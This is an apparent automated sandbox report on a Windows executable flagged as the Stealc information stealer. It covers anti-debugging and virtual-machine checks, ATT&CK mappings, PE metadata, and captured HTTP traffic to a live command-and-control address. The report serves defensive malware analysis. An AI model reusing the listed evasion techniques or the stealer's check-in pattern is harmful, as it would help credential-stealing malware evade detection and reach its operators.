              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003ACBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003AD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003ADD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003916B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003916A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_003B1BF0
              Source: file.exe, file.exe, 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2325828976.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2325828976.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26356
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26209
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26363
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26228
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26252
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394A60 VirtualProtect 00000000,00000004,00000100,?0_2_00394A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003B6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6390 mov eax, dword ptr fs:[00000030h]0_2_003B6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003B2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5480, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_003B4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003B46A0
              Source: file.exe, file.exe, 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: EProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003B2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003B1B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003B2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003B2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5480, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5480, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe45%ReversingLabsWin32.Trojan.Generic
              file.exe51%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206~0%Avira URL Cloudsafe
              http://185.215.113.206/c4becf79229cb002.phpK100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpK19%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0035.t-0009.t-msedge.net
              		13.107.246.63
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/c4becf79229cb002.phpfalse
                  		high
                  http://185.215.113.206/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phpKfile.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/Bfile.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206~file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.215.113.206/pfile.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.php#file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1560661
                              Start date and time:2024-11-22 05:15:12 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 121
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/68b591d6548ec281/sqlite3.dll
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              Invoice_Billing_carolinadunesbh.com_6995261057.htmlGet hashmaliciousUnknownBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 13.107.246.63

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.945388768802098
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'794'048 bytes
                              MD5:fcab8c77edd9c235497e92d29b6c028d
                              SHA1:5bea36fb1edcb3801f5f7d5dacda5d0ffd5ac020
                              SHA256:ece1bbf67dbee347fca668310d9fcf40f8e736d56bc81fb97e5f12f0d08ab3cb
                              SHA512:a322e25357dbc738e8085deee5d1187ca1a411b5781cb878455e7615b2a7e6f77d70c36a768308c382afe614e5c8618c106155a5a6635c265243714215c83601
                              SSDEEP:49152:pOC+TpfvWttDsNO9XY8Cg1EaaNMSs5Hp:StvWtVfuMX5Hp
                              TLSH:4E853341FD479681CC69793FC2D2DE04F2B0C516886EEAA928900E623767EF7879C57C
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa90000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F4F3C7E9C7Ah

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x16200cb4486a3e1d6b5cf3a77c8e6f9489d36unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x1ac0x200e715e4fadbb1c7df30403e5aae6e71f3False0.583984375data4.582249536808511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x2a60000x2007cb275402be1abd9cc7ed206bd44156eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cwdxftgy0x4f20000x19d0000x19c200d8c0124e11e0a28da06912624ed6cc4dFalse0.994878748673036data7.954401218621547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              bjyaubdj0x68f0000x10000x4008753cad16893f8eed2868cb985776538False0.7568359375data5.944562723310159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6900000x30000x220076f418ad1ef4049db48510a3f00d4209False0.06169577205882353DOS executable (COM)0.6981526959738622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x68dfd00x152ASCII text, with CRLF line terminators0.6479289940828402

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-22T05:16:23.817626+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649726185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 22, 2024 05:16:21.867851973 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:21.987390041 CET8049726185.215.113.206192.168.2.6
                              Nov 22, 2024 05:16:21.987500906 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:21.988171101 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:22.107656002 CET8049726185.215.113.206192.168.2.6
                              Nov 22, 2024 05:16:23.363745928 CET8049726185.215.113.206192.168.2.6
                              Nov 22, 2024 05:16:23.363883972 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:23.367254972 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:23.486758947 CET8049726185.215.113.206192.168.2.6
                              Nov 22, 2024 05:16:23.816792965 CET8049726185.215.113.206192.168.2.6
                              Nov 22, 2024 05:16:23.817625999 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:28.819969893 CET8049726185.215.113.206192.168.2.6
                              Nov 22, 2024 05:16:28.820055008 CET4972680192.168.2.6185.215.113.206
                              Nov 22, 2024 05:16:29.422888994 CET4972680192.168.2.6185.215.113.206

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 22, 2024 05:16:14.297274113 CET1.1.1.1192.168.2.60xf64No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Nov 22, 2024 05:16:14.297274113 CET1.1.1.1192.168.2.60xf64No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649726185.215.113.206805480C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 22, 2024 05:16:21.988171101 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 22, 2024 05:16:23.363745928 CET203INHTTP/1.1 200 OK
                              Date: Fri, 22 Nov 2024 04:16:23 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 22, 2024 05:16:23.367254972 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBA
                              Host: 185.215.113.206
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
